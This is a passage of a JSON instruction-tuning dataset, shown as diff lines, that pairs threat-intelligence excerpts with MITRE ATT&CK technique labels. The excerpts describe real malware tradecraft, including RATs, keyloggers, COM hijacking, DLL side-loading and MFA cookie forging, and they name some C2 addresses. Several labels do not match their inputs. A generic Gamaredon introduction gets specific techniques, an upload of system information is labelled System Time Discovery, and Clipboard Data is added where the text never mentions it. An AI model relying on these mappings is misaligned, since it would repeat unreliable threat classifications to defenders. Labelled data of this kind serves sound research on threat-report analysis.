overwrite files with the random values that would be used as a key in \"\"E\"", + "output": "- T1561.002: Disk Wipe - Disk Structure Wipe\n- T1485: Data Destruction" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443. After connecting to its C2 server, RCSession checks in with an encrypted beacon and then awaits instruction. The ORat tool, which appears to be used less frequently by the group, communicates over TCP port 80 using a raw socket protocol (not HTTP", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The two main changes are the obfuscation and the network protocol to communicate to the C2 server. The developers used two different obfuscation algorithms: one for the C2 encoding and one for the data. The C2 encoding is a simple XOR (as in 2012): The C2 encoding communication is also different. As the data are now sent with the GET method, the data must be in ASCII. That's they add base64 encoding in order to get supported characters in the HTTP query. For the first time, the developer switched from POST requests to GET requests: The exfiltrated data is appended to the URL. Here is the pattern: hxxp://C2_domain/MalwareIDVictimIPThirdIDExfiltratedDataBase64 SHA256:37d1bd82527d50df3246f12b931c69c2b9e978b593a64e89d16bfe0eb54645b0 C2 URL:hxxp://www[.]amanser951[.]otzo[.]com/uiho0.0.0.0edrftg.txt", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Helminth executable variant is able to run batch scripts provided by the C2 server, which is very similar to the script version of this Trojan. The executable variant has one additional capability that is not present in the script version, which involves the ability to log keystrokes via a supplemental keylogger module", + "output": "- T1115: Clipboard Data\n- T1056.001: Input Capture - Keylogging\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Ferocious dropper: The Excel dropper, after the user opens it and disables the protected mode, will execute a series of formulas placed in a hidden column. Initially, they will hide the main spreadsheet that requested the user to \u201cenable editing\u201d, then unhide a secondary spreadsheet that contains the decoy, to avoid raising suspicion. Otherwise, the macro will open a temporary %ProgramData%\\winrm.txt file and save a VBS stager to %ProgramData%\\winrm.vbs and set up registry keys for persistence. Otherwise, the macro will open a temporary %ProgramData%\\winrm.txt file and save a VBS stager to %ProgramData%\\winrm.vbs and set up registry keys for persistence. 5) Ferocious run-1: After the macro finishes writing to disk, it runs winrm.vbs using explorer.exe. The VBS script will also add two important registry keys for persistence. The persistence technique observed in all intrusions uses COM hijacking. In this technique, the threat actor is able to add a Class ID in the current user registry hive (HKCU) referencing the malicious VBS script written previously to %ProgramData%\\winrm.vbs. Registry keys used for COM hijacking After the above execution chain, the Excel 4.0 macro will clean up and delete the winrm.vbs and winrm.txt files. 6) Ferocious run-2: The macro will continue after the cleanup by recreating and opening the same files, winrm.vbs and winrm.txt", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "They dumped specific hives from the Windows Registry, such as the SAM hive, which contains password hashes", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volexity's investigation into this incident determined the attacker had accessed the Duo integration secret key (akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the duo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined it to be valid. This allowed the attacker with knowledge of a user account and password to then completely bypass the MFA set on the account. It should be noted this is not a vulnerability with the MFA provider and underscores the need to ensure that all secrets associated with key integrations, such as those with an MFA provider, should be changed following a breach. Further, it is important that not only are passwords changed after a breach, but that passwords are not set to something similar to the previous password (e.g", + "output": "- T1606.001: Forge Web Credentials - Web Cookies\n- T1550.004: Use Alternate Authentication Material - Web Session Cookie" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gamaredon is an advanced persistent threat (APT) group that has been active since 2013. From late 2019 to February of this year, researchers published several reports on Gamaredon, tracking the group\u2019s activities", + "output": "- T1140: Deobfuscate/Decode Files or Information\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When you run the command, it sets all the required information about the AD FS to Azure AD for the federated domain. It also creates a relying party trust for the Azure AD to the local AD FS server. When a user is authenticated on AD FS, it creates a security token including claims about the user\u2019s identity. With Azure AD, two claims are used for authentication; UserPrincipalName and ImmutabledId. Basically, the ImmutableId could be any string, as long as it matches the ImmutableId attribute of the user object in Azure AD. Typically the ImmutableId is a base 64 encoded GUID of the user object in on-premises AD (to convert GUID to immutable ID see the tools page). Converting the domain to federated also creates two claim issuance rules. For short, the rules add the UserPrincipalName and ImmutableId claims of the logged in user to the security token. When security token is delivered to Azure authentication platform, it checks the token signature, and if it matches the trust, the user is granted access", + "output": "- T1484: Domain or Tenant Policy Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NICKEL used compromised credentials to sign into victims\u2019 Microsoft 365 accounts through normal sign-ins with a browser and the legacy Exchange Web Services (EWS) protocol to review and collect victim emails. MSTIC has observed successful NICKEL sign-ins to compromised accounts through commercial VPN providers as well as from actor-controlled infrastructure", + "output": "- T1133: External Remote Services\n- T1078.004: Valid Accounts - Cloud Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file. The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) contains the following formula that Excel will save to the \u201cA0\u201d cell in the worksheet", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the system reboots, the file \u201cAJWrDz.exe\u201d executes, which in turn triggers the side-loading of the malicious (and fake) DLL file \u201cdbghelp.dll\u201d. This malicious DLL file injects itself to Windows Media Player process \u2014 wmplayer.exe, and reflectively loads the renamed jesus.dmp file, \u201cAJWrDz.dmp", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Emissary Trojan will use this GUID value provided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network communications", + "output": "- T1027: Obfuscated Files or Information\n- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There are 2 ways by which Linux/Ebury can choose a server where the DNS packets are sent. The second method uses an algorithm to generate a domain name dynamically. This domain name will be queried for its A and TXT records. The TXT record will be used to verify that it is under the control of the operators using public key cryptography. Details about the domain generation algorithm and the verification processed will be published later", + "output": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. If the decrypted payload is valid, it picks a specific existing Windows Service \u2014 LanmanServer, which is run by svchost.exe \u2014 and injects the decrypted shellcode into the legitimate service", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs", + "output": "- T1056: Input Capture\n- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. Below shows the RC4 key \"\"sV. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server\"", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim\u2019s system. According to trusted third-party reporting, communication flows from the victim\u2019s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ferocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who appear to be based in Iran. Although it has been active for a long time, the group has mostly operated under the radar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew attention when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Much of the code inside the script is from the library \u201cjs-cookie\u201d version 2.2.1. However, the attackers modified it and integrated a credit card skimmer into the original script. The skimmer binds at the events \u201cmousedown\u201d and \u201ctouchstart\u201d of the payment submit button", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. When the malicious RTF document is opened, two things happen that allow the attacker malware to run. Its called the \"\"packager trick\"\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"\"scriptlet\"\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"\"qrat.exe\"\" dropper from the current user's %tmp% directory. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message\"", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition to this, as reported by our peers at ESET last week, the group has also begun using a UEFI (Unified Extensible Firmware Interface) rootkit known as Lojax. Because the rootkit resides within a computer\u2019s flash memory, it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled", + "output": "- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "f) Hadoop YARN ResourceManager \u2013 Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability", + "output": "- T1203: Exploitation for Client Execution\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The s.exe (SHA256: 04f48ed27a83a57a971e73072ac5c769709306f2714022770fb364fd575fd462) uploaded to the error2.aspx webshell is a self-extracting 7-zip archive that is an example of the HyperBro backdoor. According to Kaspersky and SecureWorks research, HyperBro is a custom backdoor developed and used by Emissary Panda in their attack campaigns. This sample of HyperBro is similar to the sample discussed in Kaspersky\u2019s research, specifically using a legitimate pcAnywhere application to sideload a DLL to decrypt, decompress and run a payload embedded within a file named \u2018thumb.db\u2019. Table 5 shows the three files associated with this HyperBro sample, which have the same file names as the self-extracting 7zip archives mentioned in Kaspersky\u2019s blog (SHA256 hashes: 34a542356ac8a3f6e367c6827b728e18e905c71574b3813f163e043f70aa3bfa and 2144aa68c7b2a6e3511e482d6759895210cf60c67f14b9485a0236af925d8233", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "COMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe. COMSysApp service is added under the \u201cSvcHost\u201d key as a preliminary step to its execution in the context of svchost.exe. The malicious DLL is added as a service DLL of COMSysApp. COMSysApp service is restarted", + "output": "- T1546.015: Event Triggered Execution - Component Object Model Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"One, called \"\"frown.py,\"\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143\"", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Currently, Agent Tesla continues to be utilized in various stages of attacks. Agent Tesla is now able to harvest configuration data and credentials from a number of common VPN clients, FTP and Email clients, and Web Browsers. The malware has the ability to extract credentials from the registry as well as related configuration or support files. Our analysis of a swatch of current Agent Tesla samples reveals the following list of targeted software", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files\n- T1552.002: Unsecured Credentials - Credentials in Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, BoomBox downloads an encrypted file from Dropbox. For demonstration purposes, an example HTTP(s) POST request used to download the encrypted file from Dropbox is shown below", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. The keylogger itself does not communicate with the C2 or write to disk. Instead, it writes it\u2019s keylog to a registry key that it uses as a buffer. During its operation, the RAT scrapes and clears this buffer before transmitting the logged keystrokes to the C2 server", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. Instead, it writes it\u2019s keylog to a registry key that it uses as a buffer", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As described in other blog posts, Remcos appears to be developed in C++. As the release notes show, it is actively maintained. 17, 2017 Remcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos. A good example is the anti-analysis section: It is checking for an outdated artifact, the 'SbieDll.dll'. In our opinion, there are not many analysts using Sandboxie these days anymore. Below you can see the Remcos VMware detection code: The following is a code sample from aldeid.com: The blog referenced above has already described several functions of Remcos features in detail. We would like to focus on Remcos' cryptographic implementation. It uses RC4 pretty much everywhere when there is a need to decode or encode any data. Examples are registry entries, C2 server network communication or file paths shown below: The exepath registry data is base64-encoded, RC4-encrypted data. This can be converted into the typical RC4 pseudo code", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To gain access to victim environments, the threat actor began by targeting handpicked employees using LinkedIn messaging and email, advertising fake jobs to lure recipients into checking into the supposed offers. In one case, we uncovered evidence indicating that the attacker had established communication with a victim via email and convinced them to click on a Google Drive URL purporting to contain an attractive job advert. Once clicked, the URL displayed the message, \u201cOnline preview is not available,\u201d then presented a second URL leading to a compromised or rogue domain, where the victim could download the payload under the guise of a job description", + "output": "- T1566.003: Phishing - Spearphishing via Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target", + "output": "- T1040: Network Sniffing\n- T1550: Use Alternate Authentication Material" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has also used a Mac OS 